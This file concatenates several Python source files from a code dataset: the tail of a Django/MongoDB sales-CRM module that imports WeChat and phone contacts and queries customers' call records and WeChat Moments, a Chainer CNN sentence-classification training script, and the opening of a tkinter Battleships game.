ResultUtils.isUpdateValueNull(request.POST['status'],customer.status )\n# customer.zipcode = ResultUtils.isUpdateValueNull(request.POST['zipcode'],customer.zipcode )\n# customer.house_loan = ResultUtils.isUpdateValueNull(request.POST['house_loan'],customer.house_loan)\n# customer.car_loan = ResultUtils.isUpdateValueNull(request.POST['car_loan'],customer.car_loan )\n# customer.sick = ResultUtils.isUpdateValueNull(request.POST['sick'],customer.sick )\n# customer.credit = ResultUtils.isUpdateValueNull(request.POST['credit'],customer.credit )\n# customer.parent = ResultUtils.isUpdateValueNull(request.POST['parent'],customer.parent)\n# customer.save()\n#\n# # 新增或更新跑批表记录,为跑批准备\n# CommonModelUtils.saveOrUpdateLpDsSchedule(id, '0')\n#\n# return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n# else:\n# return 
HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR,\"请联系管理员\", []))\n\n# 微信通讯录导入\ndef insertByWechat(data):\n error_msg = '微信通讯录导入成功'\n # if request.method == \"POST\":\n # data = json.loads(request.POST['body'], strict=False)\n sales_id = data['SALES_ID']\n logger.info(\"*******insertByWechat begin*******\")\n # logger.info(data)\n\n for rc in data['DATASET']:\n # 去除电话号码前的+86\n wechat_phone = rc['WECHAT_PHONE'].replace(\"+86\", \"\").strip()\n wechat_no = rc['WECHAT_NO'].strip()\n wechat_memo = rc['WECHAT_MEMO'].strip()\n wechat_name = rc['WECHAT_NAME'].strip()\n\n temp_data = []\n # TODO: 动态传参数$or,待优化\n # 微信备注与手机名称一样\n if wechat_memo != None and len(wechat_memo) != 0:\n # 微信昵称与手机名称一样\n if wechat_name != None and len(wechat_name) != 0:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n {\"phone_nm\": {'$eq': wechat_name}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n {\"phone_nm\": {'$eq': wechat_name}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n # 微信昵称与手机名称一样\n if wechat_name != None and len(wechat_name) != 0:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_name}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_name}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n\n # logger.info(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data)\n ret_val = ret['ret']\n\n if len(ret_val) == 0:\n uuid = ResultUtils.getUUID()\n retval = {\"cust_id\": uuid}\n retval['sales_id'] = sales_id\n retval['wechat_no'] = wechat_no\n retval['wechat_nm'] = wechat_name\n 
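# Sketch of an alternative: this build-then-insert plus the update branch below\n            # could collapse into a single pymongo upsert, assuming the db wrapper exposes\n            # the raw collection:\n            #     collection.update_one(match_filter, {\"$set\": fields}, upsert=True)\n            # (match_filter and fields are placeholder names for the dicts built here.)\n            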
retval['wechat_memo'] = wechat_memo\n retval['phone_no'] = wechat_phone\n # retval['phone_nm'] = rc['WECHAT_MEMO']\n retval['sex'] = rc['SEX']\n retval['wechat_phone'] = wechat_phone\n retval['wechat_city'] = rc['WECHAT_CITY']\n retval['ext_city'] = rc['WECHAT_CITY']\n retval['create_date'] = ResultUtils.getNowToStr()\n retval['update_date'] = ResultUtils.getNowToStr()\n retval['status'] = '1'\n retval['isused'] = '0'\n retval['phase'] = '0'\n retval['star_flg'] = '0'\n retval['src'] = '1'\n retval['last_touch_date'] = None\n retval['used_ticket'] = '0'\n f = db.insert_item(mongoDB, 'LP_MGNT_CUST_MST', retval)\n\n # logger.info(f)\n # 销售员和客户关联表插入\n CommonModelUtils.saveOrUpdateLpMgntSalesCust(sales_id, uuid)\n # 新增或更新跑批表记录,为跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id, uuid, '0')\n\n else: # 记录存在的情况,进行更新\n f = db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id': ret_val[0]['cust_id']},\n {'$set': {'sex': rc['SEX'], 'wechat_nm': wechat_name, 'wechat_phone': wechat_phone,\n 'wechat_no': wechat_no,\n 'wechat_city': rc['WECHAT_CITY'], 'wechat_memo': wechat_memo,\n 'isused': '0', 'update_date': ResultUtils.getNowToStr()}})\n\n # logger.info(f)\n # 新增或更新跑批表记录,为跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id, ret_val[0]['cust_id'], '0')\n logger.info(\"*******insertByWechat end*******\")\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, [])\n\n\n\n# 手机通讯录导入(增)\ndef insertByPhoneNumber(data):\n error_msg = '手机通讯录导入成功'\n # if request.method == \"POST\":\n # data = json.loads(request.POST['body'], strict=False)\n sales_id = data['SALES_ID']\n logger.info(\"*******insertByPhoneNumber begin*******\")\n # logger.info(data)\n\n for rc in data['DATASET']:\n phone_no = rc['PHONE_NO'].strip()\n phone_nm = rc['PHONE_NM'].strip()\n\n if phone_no == None or len(phone_no) == 0 or phone_nm == None or len(phone_nm) == 0:\n continue\n\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"phone_no\": {'$eq': phone_no}},\n {\"wechat_phone\": {'$eq': phone_no}},\n {\"wechat_nm\": {'$eq': phone_nm}},\n {\"wechat_memo\": {'$eq': phone_nm}},\n ],\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"sales_id\": 1,\n \"cust_id\": 1,\n \"phone_no\": 1,\n \"wechat_no\": 1,\n \"wechat_phone\": 1,\n \"phone_nm\": 1,\n \"wechat_nm\": 1,\n \"wechat_memo\": 1,\n }\n },\n ]\n\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data)\n\n if len(ret['ret']) == 0:\n # logger.info('phone customer insert')\n\n uuid = ResultUtils.getUUID()\n retval = {\"cust_id\": uuid}\n retval['sales_id'] = sales_id\n retval['phone_nm'] = phone_nm\n retval['phone_no'] = phone_no\n retval['create_date'] = ResultUtils.getNowToStr()\n retval['update_date'] = ResultUtils.getNowToStr()\n retval['status'] = '1'\n retval['isused'] = '0'\n retval['phase'] = '0'\n retval['star_flg'] = '0'\n retval['src'] = '0'\n retval['last_touch_date'] = None\n retval['used_ticket'] = '0'\n f = db.insert_item(mongoDB, 'LP_MGNT_CUST_MST', retval)\n # logger.info(f)\n\n # 销售员和客户关联表插入\n CommonModelUtils.saveOrUpdateLpMgntSalesCust(sales_id, uuid)\n # 新增或更新跑批表记录,为新增客户跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id,uuid, '0')\n # 新增或更新跑批表记录,为个推跑批准备\n # CommonModelUtils.saveOrUpdateGeiTuiLpDsSchedule(uuid, '4')\n logger.info(\"*******insertByPhoneNumber end*******\")\n\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, [])\n # else:\n # return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", 
[]))\n\n\n# 更新星标状态\ndef updateStarFlg(request):\n error_msg = '客户星标更新成功'\n\n if request.method == \"POST\":\n cust_id = request.POST.get('cust_id')\n# sales_id = request.POST.get('sales_id')\n star_flg = request.POST.get('star_flg')\n\n logger.info(\"customer star flag update\" + \"|\" + cust_id + \"|\" + star_flg)\n\n try:\n ret1 = db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id': cust_id},\n {'$set': {'star_flg': star_flg,\n 'update_date': ResultUtils.getNowToStr()}})\n\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n except Exception as e:\n return HttpResponse(ResultUtils.createErrorResult(e))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 使用灵豹券\ndef useLPTicket(request):\n error_msg = '灵豹券使用成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n\n if sales_id == None or len(sales_id.strip()) == 0 or cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"sales id / cust id不能为空\", []))\n\n cust_ids = cust_id.split(\"#\")\n\n # 判断是否还有可用的灵豹券\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [{\"used_datetime\": {\"$eq\": None}}, {\"used_datetime\": {\"$eq\": ''}}],\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"ticket_id\": 1,\n }\n },\n# {\n# '$limit': 1,\n# }\n ]\n\n ret = db.aggregate(mongoDB, 'LP_SALES_TICKETS_INFO', temp_data)\n\n if ret['result'] == 1:\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], [])\n elif len(ret['ret']) < len(cust_ids):\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"您剩余的灵豹券数量不够,请购买\", [])\n else:\n idx = 0\n for cust_idx in cust_ids:\n if cust_idx != None and len(cust_idx.strip()) > 0:\n ticketNo = ret['ret'][idx]['ticket_id']\n idx = idx + 1\n\n logger.info(\"ticket used\")\n\n ret_upd = db.update_item(mongoDB, 'LP_SALES_TICKETS_INFO', {'sales_id': sales_id, 'ticket_id': ticketNo},\n {'$set': {'used_cust_id': cust_idx, 'used_datetime': ResultUtils.getNowToStr(),\n 'update_date': ResultUtils.getNowToStr()}})\n\n if ret_upd != 1:\n ret1 = db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id': cust_idx},\n {'$set': {'used_ticket': '1',\n 'update_date': ResultUtils.getNowToStr()}})\n\n # 新增或更新跑批表记录,为跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id, cust_idx, '4')\n\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg,\n {\"sales_id\": sales_id, \"cust_id\": cust_id})\n else:\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", [])\n\n# 获取该业务员+该客户的通话记录\ndef queryPhoneRecordByCustID(request):\n error_msg = '通话记录检索成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n\n if sales_id == None or len(sales_id.strip()) == 0 or cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"sales id或cust_id为Null,请联系管理员\", []))\n\n # 不显示通话时长为0的记录。1是拨入;2是拨出\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"cust_id\": cust_id,\n# \"contact_duration\": {\"$ne\": \"0\"},\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"contact_date\": 1,\n \"contact_duration\": 1,\n \"contact_type\": 1,\n }\n },\n {\n '$sort': {'contact_date': -1},\n },\n {\n '$limit': 5,\n 
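# Pipeline summary: $match narrows to this salesperson/customer, $project keeps\n                # only the call fields, $sort orders newest-first by contact_date, and\n                # $limit caps the output at the five most recent calls.\n            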
}\n ]\n\n# logger.info(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_DS_PHONE', temp_data)\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"抽取成功\", ret['ret']))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 获取该客户的朋友圈动态\ndef queryWechatGroupByCustID(request):\n error_msg = '朋友圈动态检索成功'\n\n if request.method == \"POST\":\n cust_id = request.POST.get('cust_id')\n\n if cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"cust_id为Null,请联系管理员\", []))\n\n # 不显示通话时长为0的记录。1是拨入;2是拨出\n temp_data = [\n {\n \"$match\": {\n \"cust_id\": cust_id,\n \"$or\": [ { \"moment_text\": { '$ne': '' } }, { \"moment_link\": { '$ne': '' } } ],\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"moment_date\": {\n \"$substr\": [\"$moment_date\", 0, 10]\n },\n \"moment_text\": 1,\n \"moment_link\": 1,\n }\n },\n {\n '$sort': {'moment_date': -1},\n },\n {\n '$limit': 10,\n }\n ]\n\n# logger.info(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_DS_WECHAT', temp_data)\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n # 去除重复数据,返回前5\n retval = []\n\n run_function = lambda x, y: x if y in x else x + [y]\n retval = reduce(run_function, [[], ] + ret['ret'])\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"抽取成功\", retval))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 插入灵豹券(ticket_type=\"0\":灵豹券;ticket_src \"0\":注册,\"1\":会员;\"2\":购买;\"3\":分享)\ndef insertTickets(ticket_cnt, sales_id, ticket_type, ticket_src):\n \"\"\"\n :param ticket_cnt:\n :param sales_id:\n :param ticket_type: \"0\":灵豹券;\n :param ticket_src: \"0\":注册,\"1\":会员;\"2\":购买;\"3\":分享\n :return:\n \"\"\"\n try:\n for i in range(ticket_cnt):\n logger.info(\"ticket insert begin\")\n newTicket = {}\n newTicket[\"ticket_id\"] = ResultUtils.getUUID()\n newTicket[\"sales_id\"] = sales_id\n currentDT = datetime.datetime.now()\n newTicket[\"t_no\"] = \"LPT_\" + sales_id + currentDT.strftime(\n '%Y%m%d%H%M') + ResultUtils.getUUID()\n newTicket[\"t_type\"] = ticket_type # 0:灵豹券,用于精准模型分析\n newTicket[\"t_source\"] = ticket_src # 0:用户注册送券;1:成为付费会员送券;2:主动购买;3:分享送券\n newTicket[\"t_get_date\"] = ResultUtils.getNowToStr()\n newTicket[\"t_expir_date\"] = \"2099-12-31\" # 永久有效\n newTicket[\"create_date\"] = ResultUtils.getNowToStr()\n newTicket[\"update_date\"] = ResultUtils.getNowToStr()\n newTicket[\"used_cust_id\"] = None # 使用后设置\n newTicket[\"used_datetime\"] = None # 使用后设置\n newTicket[\"src\"] = \"REG\" # 使用后设置\n\n db.insert_item('Ringball', 'LP_SALES_TICKETS_INFO', newTicket)\n\n except Exception as e:\n logger.error(e.args[0])\n","sub_path":"cmdb/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":52101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7649064","text":"from __future__ import print_function, unicode_literals, division\n\nimport sys\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom chainer import cuda\n\nfrom cnn_word_model import WordLevelCNN\nfrom utils import trace, load_bin_vec\nfrom data_formatter import 
process_mr_data, format_input\nfrom functools import reduce  # reduce() is no longer a builtin in Python 3\n\n\ndef parse_args():\n    def_epoch = 20\n    def_minibatch = 50\n    def_cv = 10\n    def_n_filter = 100\n    def_w_filter = \"3,4,5\"\n    def_embed = 300\n    def_w2v_model = \"./GoogleNews-vectors-negative300.bin\"\n    def_gpu = -1\n\n    p = ArgumentParser(description='Sentence Classification using CNN')\n\n    p.add_argument('-I', '--epoch', default=def_epoch, type=int,\n                   help='number of training epoch (default: %d)' % def_epoch)\n    p.add_argument('-B', '--batchsize', default=def_minibatch, type=int,\n                   help='minibatch size (default: %d)' % def_minibatch)\n    p.add_argument('-CV', '--cross_varidation', default=def_cv, type=int,\n                   help='number of cross-validation splits (default: %d)' % def_cv)\n    p.add_argument('-N', '--n_filter', default=def_n_filter, type=int,\n                   help='number of filters (default: %d)' % def_n_filter)\n    p.add_argument('-W', '--w_filter', default=def_w_filter, type=str,\n                   help='[comma separated] list of filter widths (default: 3,4,5)')\n    p.add_argument('-E', '--n_embed', default=def_embed, type=int,\n                   help='dimension of word embeddings (default: %d)' % def_embed)\n    p.add_argument('-W2V', '--w2v_model', default=def_w2v_model, type=str,\n                   help='w2v_model (default: %s) [set \"rand\" to initialize randomly]' % def_w2v_model)\n    p.add_argument('-GPU', '--gpu', default=def_gpu, type=int,\n                   help='gpu number (negative indices using cpu) (default: %d)' % def_gpu)\n    p.add_argument('--static', default=False, action='store_true', dest='static',\n                   help='keep word embeddings static')\n    p.add_argument('--non-static', default=False, action='store_true', dest='non_static',\n                   help='loss back prop to word embeddings layer')\n\n    args = p.parse_args()\n\n    # check args\n    try:\n        if args.epoch < 1:\n            raise ValueError('you must set --epoch >= 1')\n        if args.batchsize < 1:\n            raise ValueError('you must set --batchsize >= 1')\n        if args.cross_varidation < 2:\n            raise ValueError('you must set --cross_varidation >= 2')\n        if args.n_filter < 1:\n            raise ValueError('you must set --n_filter >= 1')\n        # --w_filter is a comma-separated string, so validate each parsed width\n        if any(int(w) < 1 for w in str(args.w_filter).split(\",\")):\n            raise ValueError('you must set every --w_filter width >= 1')\n        if args.n_embed < 1:\n            raise ValueError('you must set --n_embed >= 1')\n\n        if (args.static is False) and (args.non_static is False):\n            raise ValueError(\n                'you must use --static or --non-static or both')\n    except Exception as ex:\n        print(ex, file=sys.stderr)\n        sys.exit()\n\n    return args\n\n\ndef l2_constrain(W, s=3.0):\n    # constrain l2-norms of the weight vectors\n    # by rescaling w to have ||w||2 = s whenever ||w||2 > s\n    l2_norm = np.sqrt((W ** 2).sum())\n    if l2_norm > s:\n        W *= s / l2_norm  # rescale in place so the caller's weights are actually updated\n\n\ndef train_model(args, model, train_data, train_labels, dev_data=None, dev_labels=None):\n    trace('start training ...')\n\n    for epoch in range(args.epoch):\n        perm = np.random.permutation(len(train_data))\n        trace('epoch %d/%d: ' % (epoch + 1, args.epoch))\n        trained = 0\n        mean_loss = 0\n        for i in range(0, len(train_data), args.batchsize):\n            x_batch = train_data[perm[i:i + args.batchsize]]\n            t_batch = train_labels[perm[i:i + args.batchsize]]\n            if args.gpu >= 0:\n                x_batch = cuda.to_gpu(x_batch)\n                t_batch = cuda.to_gpu(t_batch)\n            loss = model.train(x_batch, t_batch)\n            mean_loss += (loss.data / len(x_batch))\n            trained += len(x_batch)\n            l2_constrain(model.model.linear.W, s=3)\n            sys.stderr.write(\"\\rtrained %d / %d\" % (trained, len(train_data)))\n            sys.stderr.flush()\n        sys.stderr.write(\"\\n\")\n        trace(\"epoch: %d, train_mean_loss = %.6f \" %\n              (epoch + 1, float(mean_loss)))\n        if dev_data is not None:\n            test_model(args, model, dev_data, dev_labels)\n\n    
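# Standalone illustration of the norm constraint applied in the loop above\n    # (plain numpy, names hypothetical):\n    #     w = np.array([3.0, 4.0])   # ||w|| = 5\n    #     s = 3.0\n    #     norm = np.sqrt((w ** 2).sum())\n    #     if norm > s:\n    #         w *= s / norm          # now ||w|| == 3\n    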
trace('finished training.')\n\n\ndef test_model(args, model, test_data, test_labels):\n    trace('calculate accuracy ...')\n\n    sum_acc = 0\n    for i in range(0, len(test_data), args.batchsize):\n        x_batch = test_data[i:i + args.batchsize]\n        t_batch = test_labels[i:i + args.batchsize]\n        if args.gpu >= 0:\n            x_batch = cuda.to_gpu(x_batch)\n            t_batch = cuda.to_gpu(t_batch)\n        acc = model.predict(x_batch, t_batch)\n        sum_acc += acc.data * len(x_batch)\n\n    trace('finished.')\n    trace(\"accuracy = %.6f\" % float(sum_acc/len(test_data)))\n\n\ndef main():\n    args = parse_args()\n\n    trace('initializing ...')\n    if args.gpu >= 0:\n        cuda.check_cuda_available()\n\n    file_dir = \"./\"\n    vocab, x_data, y_data = process_mr_data(file_dir, args.cross_varidation)\n\n    trace('embeddings are initialized by: %s' % str(args.w2v_model))\n    trace('n_epoch: %d' % args.epoch)\n    trace('n_filter: %d' % args.n_filter)\n    trace('w_filter: %s' % args.w_filter)\n\n    w_filter = [int(w) for w in str(args.w_filter).split(\",\")]\n    pad = max(w_filter)-1\n    # load word2vec_model\n    if args.w2v_model == \"rand\":\n        trace(\"word embeddings are randomly initialized\")\n        word2vec_vocab = {}\n    else:\n        trace(\"load word2vec model...: %s\" % (args.w2v_model))\n        word2vec_vocab = load_bin_vec(args.w2v_model, vocab)\n        trace(\"finished.\")\n\n    for i in range(args.cross_varidation):\n        trace(\"cross_varidation: %d\" % (i+1))\n\n        model = WordLevelCNN.new(len(vocab), n_embed=args.n_embed,\n                                 n_filter=args.n_filter, w_filter=w_filter,\n                                 static=args.static, non_static=args.non_static)\n        model.init_embed(word2vec_vocab, vocab)\n        model.init_optimizer()\n        if args.gpu >= 0:\n            cuda.get_device(args.gpu).use()\n            model.model.to_gpu()\n\n        test_x = np.array(format_input(x_data[i], pad, vocab), dtype=np.int32)\n        test_y = np.array(y_data[i], dtype=np.int32)\n        # dev_x = x_data[i+1]\n        # dev_y = y_data[i+1]\n        # Concatenate every fold except fold i to form the training split\n        train_x = reduce(lambda a, b: a+b, x_data[:i]+x_data[i+1:])\n        train_y = reduce(lambda a, b: a+b, y_data[:i]+y_data[i+1:])\n        train_x = np.array(format_input(train_x, pad, vocab), dtype=np.int32)\n        train_y = np.array(train_y, dtype=np.int32)\n\n        train_model(args, model, train_x, train_y)\n        test_model(args, model, test_x, test_y)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"320499128","text":"# # # # # # # # # # # # # # # # # # # #\r\n#\r\n# Created 11th June 2018, Raymond Feng\r\n#\r\n# Updated: 22nd July 2018\r\n#\r\n# Purpose: Main battleships game class\r\n#\r\n# # # # # # # # # # # # # # # # # # # #\r\n\r\n# Current version of the program.\r\nversion = 2.21\r\n\r\n\r\nimport tkinter as tk\r\nimport random\r\nimport datetime\r\nimport os.path\r\n\r\n# Custom widgets module\r\nfrom frameworks.custom_widgets import *\r\n\r\n\r\n### Function for switching between different screens ###\r\n# – Screens can be of splash, setup, game (with 'Game' object arg)\r\n# – Note: All screens (splash, setup etc.) 
are of type tk.Frame\r\n#####\r\ndef switch_screen(screen, args=None):\r\n global current_screen\r\n\r\n # If there was previously a screen, destroy that screen\r\n if current_screen != None: current_screen.destroy()\r\n\r\n if screen == 'splash': current_screen = SplashScreen(root)\r\n elif screen == 'setup': current_screen = SetupWindow(root)\r\n elif screen == 'game': current_screen = GameWindow(root, args)\r\n\r\n # Packs the new screen frame into the root window\r\n current_screen.pack()\r\n\r\n # Temporary white frame to hide widgets being destroyed\r\n white = tk.Frame(root, bg='white', width=1000, height=1000)\r\n white.place(x=0, y=0, anchor='nw')\r\n\r\n root.after(50, white.destroy)\r\n\r\n\r\n### Splash screen to load a saved game, start a new game or view scoreboard ###\r\nclass SplashScreen(tk.Frame):\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n\r\n # Uses the colour theme defined at startup\r\n theme = Colours(manager.theme)\r\n\r\n # Horizontal bar (aesthetic)\r\n self.bar = tk.Frame(self, width=800, height=25, bg=theme.GRAY_DARK)\r\n self.bar.pack(side='top', pady=(60, 0))\r\n\r\n # Title (aesthetic)\r\n self.title = tk.Label(self, text=\"BATTLESHIPS\", font=(\"Tw Cen MT\", 100, \"bold\"), fg=theme.GRAY_BLACK)\r\n self.title.pack(side='top', padx=(26, 240), pady=(20, 10))\r\n\r\n # Container for all other elements beneath title\r\n self.main_frame = tk.Frame(self, width=750, height=320, bg=theme.WHITE)\r\n self.main_frame.pack(side='bottom')\r\n\r\n self.main_frame.grid_propagate(0)\r\n self.main_frame.grid_columnconfigure(0, weight=1)\r\n self.main_frame.grid_columnconfigure(1, weight=0)\r\n\r\n # Lefthand side rounded frame for displaying information and scoreboards #\r\n info_canvas = tk.Canvas(self.main_frame, width=480, height=320, highlightthickness=0)\r\n info_canvas.grid(column=0, row=0, sticky='nw')\r\n\r\n # Creates a rounded rectangle (aesthetic)\r\n rounded_rect(info_canvas, 0, 0, int(info_canvas[\"width\"]), int(info_canvas[\"height\"]), 50, colour=theme.GRAY_LIGHT)\r\n\r\n # Outer information text, static\r\n info_text = ['>bBeta Release V{:.2f}'.format(version),\r\n '>lSCOREBOARD',\r\n '', '', '', '', '',\r\n '\\n',\r\n '>sDesigned by Raymond Feng, 2018.',\r\n '>sGo to http://www.spprax.com to find out more']\r\n\r\n scoreboard_text = ['']\r\n\r\n # Appends all the scores for different difficulties into scoreboard_text\r\n for mode in ('easy', 'normal', 'hard', 'master'):\r\n scoreboard_text.append('{} Mode:\\t{} wins – {} losses'.format(mode.upper(),\r\n manager.stats[mode][0],\r\n manager.stats[mode][1]))\r\n\r\n # Creates a frame with labels for every element in info_text\r\n info_labels = CustomLongText(info_canvas, text=info_text, height=270, width=400,\r\n fg=theme.GRAY_BLACK, bg=theme.GRAY_LIGHT)\r\n info_canvas.create_window(int(info_canvas[\"width\"]) / 2, int(info_canvas['height']) / 2,\r\n window=info_labels, anchor='center', tag='window')\r\n\r\n # Creates a frame with labels for every element in scoreboard_text\r\n scoreboard_labels = CustomLongText(info_canvas, text=scoreboard_text, height=140, width=400,\r\n fg=theme.GRAY_BLACK, bg=theme.WHITE)\r\n info_canvas.create_window(int(info_canvas['width']) / 2, int(info_canvas['height']) / 2 + 10,\r\n window=scoreboard_labels, anchor='center', tag='window')\r\n\r\n def reset():\r\n manager.reset_scores()\r\n switch_screen('splash')\r\n\r\n reset_score_button = CustomButton(info_canvas, text=\"Reset Scores\", width=90, height=40, font=(\"Tw Cen MT\", 12),\r\n colour=theme.GRAY, 
fg=theme.WHITE, active=theme.GRAY_DARK, bg_canvas=theme.GRAY_LIGHT)\r\n\r\n reset_score_button.bind_to_click(reset)\r\n info_canvas.create_window(440, 295, window=reset_score_button, anchor='se', tag='window')\r\n\r\n # Right hand side frame, acts as a buttons container #\r\n buttons_container = tk.Frame(self.main_frame, width=256, height=int(self.main_frame[\"height\"]))\r\n buttons_container.grid(column=1, row=0, sticky='nw')\r\n buttons_container.pack_propagate(False)\r\n\r\n # Creates a button to start a new game, switching to setup window\r\n new_game_button = CustomButton(buttons_container, text=\"New Game\", width=250, height=80,\r\n colour=theme.CYAN, fg=theme.WHITE, active=theme.CYAN_DARK)\r\n new_game_button.bind_to_click(lambda: switch_screen('setup'))\r\n new_game_button.place(x=0, y=-1, anchor='nw')\r\n\r\n # Creates a button to open saves frame\r\n load_button = CustomButton(buttons_container, text=\"Load Saved\", width=250, height=80,\r\n colour=theme.TURQUOISE, fg=theme.WHITE, active=theme.TURQUOISE_DARK)\r\n load_button.place(x=0, y=84, anchor='nw')\r\n\r\n # Creates a button to destroy application window\r\n close_button = CustomButton(buttons_container, text=\"✘\", width=80, height=60,\r\n colour=theme.RED, fg=theme.WHITE, active=theme.RED_DIM)\r\n close_button.place(x=251, y=int(self.main_frame[\"height\"]), anchor=\"se\")\r\n 